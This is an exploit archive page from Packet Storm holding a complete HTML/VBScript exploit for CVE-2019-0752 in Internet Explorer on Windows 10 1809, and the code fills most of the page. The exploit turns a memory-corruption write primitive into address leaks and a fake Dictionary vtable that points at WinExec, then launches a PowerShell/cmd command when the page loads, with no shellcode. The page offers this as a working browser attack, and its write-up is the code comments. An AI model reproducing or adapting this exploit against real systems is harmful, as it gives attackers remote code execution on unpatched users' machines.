what you don't know can hurt you

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption
Posted May 24, 2019
Authored by Simon Zuckerbraun

Microsoft Internet Explorer Windows 10 1809 17763.316 scripting engine memory corruption exploit.

tags | exploit
systems | windows
advisories | CVE-2019-0752
MD5 | c9397c14195bc3f85cf0bc8c751e4a75

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Change Mirror Download
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->
<!-- all the way to RCE using no shellcode. -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->
<!-- (h/t: James Forshaw, Google Project Zero) -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
<div id="container1" style="overflow:scroll; width: 10px">
<div id="content1" style="width:5000000px">
Content
</div>
</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
Private mValue
Public Property Let Value(v)
mValue = v
End Property
Public Default Property Get P
P = mValue ' Where to write
End Property
End Class
Sub TriggerWrite(where, val)
Dim v1
Set v1 = document.getElementById("container1")
v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd)
Dim c
Set c = new MyClass
c.Value = where
Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
TriggerWrite addr , (val) AND &hff
TriggerWrite addr + 1, (val\&h100) AND &hff
TriggerWrite addr + 2, (val\&h10000) AND &hff
TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
For i = 0 To Len(str) - 1
TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
Next
End Sub
Function ReadInt32(addr)
WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
Set ar1(gremlin + 1) = obj
LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
' Corrupt vt of one array element (the "gremlin")
TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4
For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
If Not IsEmpty(ar1(i)) Then
gremlin = i
Exit For
End If
Next

If IsEmpty(gremlin) Then
MsgBox "Could not find gremlin"
Exit Sub
End If

For i = 0 To UBound(ar2)
Set ar2(i) = CreateObject("Scripting.Dictionary")
Next

Set dict = ar2(UBound(ar2) / 2)
addressOfDict = LeakAddressOfObject(dict)
vtableOfDict = ReadInt32(addressOfDict)
scrrun = vtableOfDict - &h11fc
kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
winExec = kernel32 + &h5d380

dict.Exists "dummy" ' Make a dispatch call, just to populate pld
' Relocate pld to ensure its address doesn't contain a null byte
pld = ReadInt32(addressOfDict + &h3c)
fakePld = &h28281020
For i = 0 To 3 - 1
WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
Next

fakeVtable = &h28282828 ' ASCII "(((("
For i = 0 To 21
If i = 12 Then ' Dictionary.Exists
fptr = winExec
Else
fptr = ReadInt32(vtableOfDict + 4 * i)
End If
WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
Next

WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""

On Error Resume Next
dict.Exists "dummy" ' Wheeee!!

' A little cleanup to help prevent crashes after the exploit
For i = 1 To 3
WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
Next
Erase Dict
Erase ar2
End Sub
Exploit
</script>
</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close